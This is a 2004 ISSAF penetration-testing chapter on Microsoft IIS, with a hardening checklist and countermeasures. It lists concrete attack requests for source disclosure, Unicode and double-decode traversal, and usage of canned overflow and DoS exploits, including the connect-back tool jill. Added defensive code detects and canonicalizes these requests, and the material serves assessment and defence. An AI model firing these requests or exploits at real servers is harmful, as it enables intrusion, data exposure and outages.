
R WEB APPLICATION SECURITY (CONTINUED): WEB SERVER SECURITY ASSESSMENT


A.1 MICROSOFT INTERNET INFORMATION SERVER
Description
Microsoft Internet Information Server has a long history of vulnerabilities. By its nature, up to IIS version 5.0 it provides various services by default; Microsoft has limited this considerably in IIS version 6.0. IIS security testing can be divided into three major categories: 1. Information Disclosure, 2. Buffer Overflow and 3. File System Traversal.
Microsoft has provided service packs from time to time, and an attacker takes advantage of patches that have not been applied. Most of the time people install service packs but miss the hot fixes.
Another important aspect to consider while testing the security of IIS is the firewall. Several times you may find a vulnerability and a related proof-of-concept tool, but the tool may be blocked by the firewall because the required port is not open.

A.1.1 Summary

The original summary table has the columns Extension, Requirement, Vulnerability, Reference, GET Request, Expected Response and Prerequisite. Its rows are listed here one record per extension.

Extension: .asp
Requirement: ASP functionality
Vulnerability: ASP and HTTP related buffer overflows
Reference: Search www.Microsoft.com
GET Request: default.asp
Expected Response: 200 OK

Extension: .htr
Requirement: To reset password from Internet
Vulnerability: Reveals source code
Reference: MS02-018; Search www.Microsoft.com
GET Request: default.asp+.htr

Extension: .idc
Requirement: Internet Database Connector
Vulnerability: Reveals directory path
Reference: MS01-04; Search www.Microsoft.com
GET Request: /null.idc
Expected Response: 500 error

Extension: .stm, .shtm, .shtml
Requirement: Server Side Include
Vulnerability: Remote buffer overflow
Reference: Q193689; Search www.Microsoft.com
GET Request: /<file>.stm, .shtm, .shtml
Expected Response: 200 OK
Prerequisite: Requested file must be present

Extension: .printer
Requirement: Printing from Internet
Vulnerability: Remote buffer overflow
Reference: MS01-044; Search www.Microsoft.com
GET Request: /null.printer
Expected Response: 500 Internal Server Error

Extension: .htw
Requirement: Highlight text in web page
Vulnerability: Reveals source code
Reference: MS01-023, MS00-006; Search www.Microsoft.com
GET Request: /null.htw
Expected Response: 200 OK, "The format of QUERY_STRING is invalid"
Prerequisite: Index Server

Extension: .ida, .idq
Requirement: Index Server
Vulnerability: Remote buffer overflow
Reference: MS01-033; Search www.Microsoft.com
GET Request: /null.ida, /null.idq
Expected Response: 200 OK, "The IDQ file could not be found."
Prerequisite: Index Server

Extension: FrontPage Server Extensions
Requirement: FrontPage Server Extensions
Vulnerability: Remote buffer overflow
Reference: MS01-035; Search www.Microsoft.com
GET Request: /_vti_bin/_vti_aut/fp30reg.dll
Expected Response: 501 Not Implemented
Prerequisite: FrontPage Server Extensions 2000, Visual Studio RAD

Extension: WebDAV
Requirement: WebDAV
Vulnerability: Remote root exploit
Reference: www.k-otik.com
Expected Response: Successful, attempting to join shell ...
Prerequisite: Search method is allowed.

Extension: WebDAV
Requirement: WebDAV server
Vulnerability: Remote DoS attack
Reference: www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-018.asp
Expected Response: Server is DoSsed! Now run !! F-B-eyee is after j00...
Prerequisite: The exploit is available at www.k-otik.com

Information Systems Security Assessment Framework (ISSAF) Draft 0.1
2004, Balwant Rathore, Open Information Systems Security Group (www.oissg.org)
Date: 11/16/2016

A.1.2 Information Disclosure

A.1.2.1 ASP ::$DATA BUG
It occurs because of an error in the way IIS parses file names. A crafted request displays the content of server-side files. Type http://www.target.com/default.asp::$DATA in your browser; it will display the source code of the default.asp file in your browser.
Prerequisites:
1. IIS version below 3.0
2. The file has to be on an NTFS partition and must have read access

A.1.2.2 ASP DOT BUG

Displays ASP source code by appending one or more dots to the end of the URL.
http://www.target.com/products.asp.
At the end of the above URL an extra dot is added. IIS is not able to handle this request properly and reveals the source code.
Prerequisites:
1. Up to IIS 3.0
2. Read access to the desired resource.

A.1.2.3 +.HTR BUG

Reveals the source code by appending +.htr to the end of the request.
http://www.target.com/abc.asp+.htr
Prerequisites:
1. IIS 4.0 prior to the Windows NT 4.0 Service Pack 6a Security Rollup Package (SRP)
2. IIS 5.0 up to SP2, prior to Windows 2000 Security Rollup Package 1

A.1.2.4 .IDC, .IDA AND .IDQ BUGS

Similar to the .asp bug, but this time you get the directory path of IIS instead of the source code.
http://www.target.com/abc.idc
This results in the full path, which can be used to find further holes:
C:\inetpub\wwwroot\abc.idc not found
http://www.target.com/def.idq
http://www.target.com/ghi.ida
Prerequisites:
IIS 5.0 without any service pack.
Request anything.idq and you will get the path.

A.1.2.5 ISM.DLL BUFFER TRUNCATION

Displays the source code of scripts and the contents of files by appending spaces in hexadecimal and .htr to the URL.
http://www.target.com/global.asa%20%20(...<=230)global.asa.htr
It reveals the source code of global.asa.
Prerequisites: IIS 4.0 and 5.0

A.1.2.6 NT SITE SERVER ADSAMPLES BUG

Displays site.csc, which contains the DSN, UID, PASSWORD etc.
http://www.target.com/adsamples/config/site.csc
Prerequisites:

A.1.2.7 TRANSLATE:F BUG

If someone makes a request for an ASP/ASA or any other scriptable page and adds Translate: f to the headers of the HTTP GET, they come up with the complete ASP/ASA source code.
Prerequisite: Windows 2000 with SP1 not installed

A.1.2.8 NULL.HTW

This vulnerability can give the source code of a server-side ASP page. The ASP page could give valuable information like usernames and passwords.
http://www.target.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full
CiWebhitsfile, CiRestriction and CiHiliteType are the three variables of null.htw; null.htw takes user input in these three variables. As a result you get the source code of the default.asp file.
Prerequisites:
1. Index Server
2. null.htw

A.1.2.9 WEBHITS.DLL & .HTW BUG

Displays the source code of ASP and other scripts.

http://www.target.com/nosuchfile.htw
If you get the error "format of the QUERY_STRING is invalid", you are vulnerable.
Prerequisite: control of the CiWebhitsfile argument
As the user has control of the CiWebhitsfile argument passed to the .htw file, he can request whatever he wants.
You can find .htw files in the following locations on different IIS web servers:
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/isssamples/exair/search/qfullhit.htw
/isssamples/exair/search/qsumrhit.htw
/isshelp/iss/misc/iirturnh.htw
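A defender-side complement to the summary table and the disclosure bugs above, added here and not part of the ISSAF text: a scanner that reads IIS W3C extended log lines (the format the checklist in A.3.1 recommends) and flags the request signatures catalogued on this page. The SIGNATURES names, the log lines and the client addresses are constructed; header-only bugs such as Translate: f leave no trace in the cs-uri fields and cannot be found this way.

```python
import re

# Signature -> regex over "cs-uri-stem?cs-uri-query" as the server logged it
# (IIS 5 may write decoded stems, so %c0%af can appear as raw bytes instead).
SIGNATURES = {
    "asp ::$DATA stream":      re.compile(r"\.asp::\$data", re.I),
    "asp trailing dot":        re.compile(r"\.asp\.+(\?|$)", re.I),
    ".htr source disclosure":  re.compile(r"\.htr(\?|$)", re.I),
    ".idc/.ida/.idq probe":    re.compile(r"\.(idc|ida|idq)(\?|$)", re.I),
    ".printer overflow":       re.compile(r"\.printer(\?|$)", re.I),
    ".htw hit-highlight":      re.compile(r"\.htw\?.*ciwebhitsfile=", re.I),
    "FrontPage fp30reg.dll":   re.compile(r"/_vti_bin/_vti_aut/fp30reg\.dll", re.I),
    "AdSamples site.csc":      re.compile(r"/adsamples/config/site\.csc", re.I),
    "Unicode traversal":       re.compile(r"%c0%af|%c1%9c", re.I),
    "double-decode traversal": re.compile(r"%25(2f|5c)", re.I),
}

# Constructed sample log in IIS W3C extended format (not a real capture).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2004-03-01 10:00:01 192.0.2.10 GET /default.asp - 200
2004-03-01 10:00:02 192.0.2.10 GET /default.asp::$DATA - 200
2004-03-01 10:00:03 192.0.2.10 GET /default.asp+.htr - 200
2004-03-01 10:00:04 192.0.2.10 GET /null.printer - 500
2004-03-01 10:00:05 192.0.2.10 GET /null.htw CiWebhitsfile=/default.asp&CiRestriction=none&CiHiliteType=full 200
2004-03-01 10:00:06 192.0.2.10 GET /_vti_bin/_vti_aut/fp30reg.dll - 501
2004-03-01 10:00:07 192.0.2.10 GET /scripts/..%c0%af../report.txt - 200
2004-03-01 10:00:08 192.0.2.11 GET /products.asp - 200
""".splitlines()


def parse_w3c(lines):
    """Yield one dict per data line, keyed by the names in the #Fields: directive."""
    fields = None
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # a later directive may change the schema
        elif line.startswith("#") or not line.strip():
            continue                       # other directives, blank lines
        elif fields is None:
            raise ValueError("data line before any #Fields: directive")
        else:
            yield dict(zip(fields, line.split()))


def scan(lines):
    """Return (c-ip, request, sc-status, [signature names]) for each matching line."""
    hits = []
    for rec in parse_w3c(lines):
        query = rec.get("cs-uri-query", "-")          # "-" means empty in W3C logs
        request = rec.get("cs-uri-stem", "") + ("" if query == "-" else "?" + query)
        names = [name for name, rx in SIGNATURES.items() if rx.search(request)]
        if names:
            hits.append((rec.get("c-ip", "?"), request, rec.get("sc-status", "?"), names))
    return hits
```

The .htr and .idc/.ida/.idq patterns also match legitimate use of those ISAPI mappings, so on a server that still needs them, correlate the hits with the status codes and the source address before acting.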

A.1.3 Buffer overflow
A.1.3.1 WEBDAV REMOTE ROOT EXPLOIT

If IIS 5.0 is unpatched, there is a good chance that a simple overflow will give root to the attacker. The exploit written by Schizoprenic is available on www.k-otik.com. It is a canned exploit, and if your exploit's output gives you something like
Successful, attempting to join shell ...
that means the server is vulnerable. The administrator's first priority shall be to apply the patch on the affected server.

A.1.3.2 WEB DAV

If the TRACE method is enabled, try the Xwbf-v0.3.exe exploit. It works on port 80 and requires a connection back from the target. Hopefully you will find that the firewall is allowing even connections from the target (web server) to the public network. This exploit provides root access.
A corporate firewall will not allow NetBIOS for public access; if it is allowed internally, SMBDie can be checked. It works after Service Pack 3; a hot fix for this is available. It reboots the Windows 2000 machine.
There is also an .htr buffer overflow against IIS 4.0 by eEye.

A.1.3.3 JILL
jill is written in UNIX C and can also be compiled using Cygwin for Windows 2000.
$ gcc -o jill jill.c
This binary can be run either from the Cygwin shell or from a Win32 console if cygwin1.dll is in the path.
$ ./jill
iis5 remote .printer overflow.
dark spyrit <dspyrit@beavuh.org> / beavuh labs.
usage: ./jill <targetHost> <targetPort> <attackerHost> <attackerPort>

A.1.3.4 SECHOLE REMOTE EXPLOIT

A.1.3.5 FRONT PAGE 2000 EXTENSIONS
Buffer overflow in the FrontPage 2000 Server Extensions (FPSE 2000), a set of three programs that support features such as collaborative authoring, hit counters, e-mail form handling and editing a web site directly on a server.
Prerequisites:
1. FrontPage Server Extensions 2000
2. Visual Studio RAD
When you install the FrontPage Server Extensions 2000, fp30reg.dll and fp4areg.dll are installed by default.
When either of these DLLs receives a URL request longer than 258 bytes, a buffer overflow occurs.
Once an attacker finds that a server has these DLLs, he can use the exploit "fpse2000ex.exe".

A.1.4 DoS
As pointed out by SPI Dynamics, a vulnerability in IIS 5.0 and IIS 5.1 can lead to denial of service. The worse part is that it is remote and causes the server to restart. The proof-of-concept exploit is available at www.k-otik.com. It is a canned exploit, so do not use it on your production server. The exploit works as below:
#./iisdos
Usage : <I.P./Hostname>
#./iisdos 172.16.169.17
Server is DoSsed! Now run !! F-B-eyee is after j00...
This shows that my server 172.16.169.17 is vulnerable and needs to be patched.

A.1.5 File system traversal

A.1.5.1 UNICODE FILE SYSTEM TRAVERSAL
Overlong Unicode (UTF-8) representations of "/" and "\" are "%c0%af" and "%c1%9c" respectively. There might even be longer (3+ byte) overlong representations. IIS decodes the Unicode after path checking rather than before. With this Unicode representation it is possible to use "../" to back up into the system directory and feed input to the command shell.

A.1.5.2 DOUBLE DECODE FILE SYSTEM TRAVERSAL

Doubly encoded hexadecimal characters also allowed HTTP requests to be constructed that escaped the normal IIS security checks and permitted access to resources outside the web root.
The % character is represented by %25. Thus the string %255c, if decoded two times in sequence, translates to a single backslash. Two decodes are required here, and IIS does perform two decodes on HTTP requests that traverse the executable directories.
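An added illustration, not IIS code and not part of the ISSAF text, of why decode order matters in A.1.5.1 and A.1.5.2: naive_check models the pre-patch IIS order (one percent-decode, traversal check, UTF-8 decode only afterwards), while canonical_path decodes fully first, including %255c and the overlong %c0%af, and only then resolves "..". Paths such as /scripts/..%c0%af../secret.txt are constructed samples, and the function names are this example's own.

```python
from urllib.parse import unquote_to_bytes


def _resolve(text):
    """Collapse '.'/'..' segments; report whether '..' climbed above the web root."""
    parts, escaped = [], False
    for seg in text.replace("\\", "/").split("/"):
        if seg == "..":
            if parts:
                parts.pop()
            else:
                escaped = True              # more '..' than directories: outside root
        elif seg not in ("", "."):
            parts.append(seg)
    return "/" + "/".join(parts), escaped


def _lenient_utf8(data, findings):
    """Decode UTF-8 but ACCEPT overlong 2/3-byte forms (%c0%af -> '/'), recording each."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        n = 1 if b < 0x80 else 2 if 0xC0 <= b <= 0xDF else 3 if 0xE0 <= b <= 0xEF else 0
        tail = data[i + 1:i + n]
        if n == 0 or len(tail) != n - 1 or any(not 0x80 <= c <= 0xBF for c in tail):
            out.append("\ufffd")            # malformed byte: U+FFFD, advance by one
            i += 1
            continue
        cp = b if n == 1 else b & (0x3F >> (n - 1))
        for c in tail:
            cp = (cp << 6) | (c & 0x3F)
        if n > 1 and cp < 0x80:             # one byte would have sufficed: overlong
            findings.append("overlong UTF-8 %s -> %r" % (data[i:i + n].hex(), chr(cp)))
        out.append(chr(cp))
        i += n
    return "".join(out)


def naive_check(raw):
    """Pre-patch IIS order (modelled): one percent-decode, check, UTF-8 decode later."""
    return _resolve(unquote_to_bytes(raw).decode("latin-1"))


def canonical_path(raw, max_decodes=2):
    """Safe order: percent-decode up to max_decodes times (IIS performed two),
    decode UTF-8 leniently to expose overlong forms, THEN resolve '..'."""
    findings, data = [], raw.encode("latin-1")
    for round_no in range(1, max_decodes + 1):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break                           # nothing left to decode
        if round_no > 1:
            findings.append("double-encoded sequence decoded in round %d" % round_no)
        data = decoded
    path, escaped = _resolve(_lenient_utf8(data, findings))
    if escaped:
        findings.append("path climbs above the web root")
    return path, escaped, findings
```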

A.2 REFERENCE
http://archives.neohapsis.com/archives/ntbugtraq/2000-q4/0029.html

A.3 INTERNET INFORMATION SYSTEM (IIS) SECURITY CHECKLIST

By Hernán Marcelo Racciatti, Hernan@oissg.org, Coordinator, Open Information System Security Group, Argentina
The steps shown next are oriented to securing a server running IIS, disconnected from a domain environment, commonly a bastion host located in the DMZ portion of a corporate network, running the IIS services.

A.3.1 Steps to Secure:

Step / Notes

- Consider the security of the environment. Notes: DMZ, networking, border router, app server, database server, etc.
- Implement operating system hardening and apply all the pertinent security revisions. Notes: Use checklists and tools from the software provider.
- Remove the components that are not necessary. Notes: e.g. unused IIS ISAPI DLLs unmapped. Remove sample web content/applications.
- The account running the HTTP service should be low privileged.
- Enable only essential web service extensions.
- Place content on a dedicated disk volume. Notes: Without administrative utilities!!
- Configure NTFS permissions.
- Configure IIS web site permissions.
- Configure IIS logging. Notes: Preferably in W3C format.
- Configure appropriate authentication mechanisms for relevant directories.
- Implement Secure Sockets Layer (SSL) and certificate server.
- Install and configure a virus protection solution.
- Install and configure a host-based IDS.
- Secure well-known accounts. Notes: Rename the built-in Administrator account, assign a complex password. Ensure the Guest account is disabled. Change the account description.
- Execute the applications with application protection medium or high. Notes: IIS 6.0 default, IIS 4.0/5.0.
- Secure service accounts.
- Implement security in depth (IPSec filters).
- Implement IISLockdown and URLScan.
- Implement an assessment policy.

A.3.2 References
Hardening IIS 5.0
http://www.shebeen.com/w2k
http://www.microsoft.com/technet/prodtechnol/windows2000serv/technologies/iis/deploy/depovg/securiis.mspx
http://www.microsoft.com/technet/prodtechnol/windows2000serv/technologies/iis/tips/iis5chk.mspx

Hardening IIS 6.0
http://www.microsoft.com/technet/Security/prodtech/win2003/w2003hg/sgch08.mspx

A.4 APACHE SECURITY ASSESSMENT


A.5 GLOBAL COUNTERMEASURES

Secure administrative access

Limit web server access to administrators and allow access only through secure authentication mechanisms. In remote management scenarios the IP addresses allowed to administer the web server should be clearly defined and the administrative processes restricted to these specific IP addresses. Administrative access should make use of a secure capability such as secure shell (ssh) or VPN.

Harden web-server

o Web-server hosts should have non-essential services disabled
o Configure SYN cookies at the OS level to protect against SYN flood attacks
o Web-server hosts must be updated with the latest security fixes for the operating system and web server software
o Web-server hosts should have the minimum number of accounts in the system
o Remove all non-essential files such as phf from the scripts directory /cgi-bin
o Remove all sample directories and pages that are shipped with web servers
o Disable directory browsing, especially on folders containing scripts or executables
o Do not assign write and script/execute permissions to the same folder
o Disable anonymous access for the FTP service
o Remove unused script mappings

Secure change control procedures


o Any change on the web server, including web page updates, patch application and hardware replacement, should be documented and authorized.
o There should be procedures to continuously track and rectify new security issues on the deployed web server.
o Web site update procedures must be clearly defined. Do all updates from the intranet. Maintain web page originals on a server in the intranet and make all changes and updates there; then "push" these updates to the public server through an SSL connection.

Enable logging and do periodic analysis


Log all user activity and monitor the logs. Conduct periodic analysis of system
logs to detect suspicious activity.

Audit Web server periodically


Conduct periodic security audits to assess the strength of the Webserver. Audit
can be manual verification against a pre-defined checklist or it can also be
automated by tools. Periodic penetration testing of website also adds meaningful
insights on the vulnerabilities of the web server.

Run web server in a chroot jail

o The damage that a successful attacker can inflict can be further limited by running the web server in a chroot-ed environment. The Unix chroot system call changes the root directory of a process, such that the process can then no longer access any of the files above the specified root directory in the filesystem hierarchy. All web pages and configuration files need to be in the chroot directory.
o Run the FTP server in a separate chrooted part of the directory tree that is different from that of the web server.
o For the Windows platform, limit the top-level root directory to an isolated directory structure with strict permissions configured.

Compartmentalize web server process

o Use of safe application environments along the lines of Trusted Operating Systems is recommended for isolating the web server process from other system processes. This will contain attacks and prevent damage to web servers.

Run web server as a non-root user

o Web servers are susceptible to root compromise using buffer overflow attacks when the web server daemon is run as root. It is safer to run the web server as a non-root user to minimize damage from the attack.

Implement web server load balancing

o Mission-critical web sites should have multiple servers onto which the load is distributed. This will make it difficult to hog the performance of the server, thereby reducing the chances of performance-based denial of service attacks. It also adds redundancy.
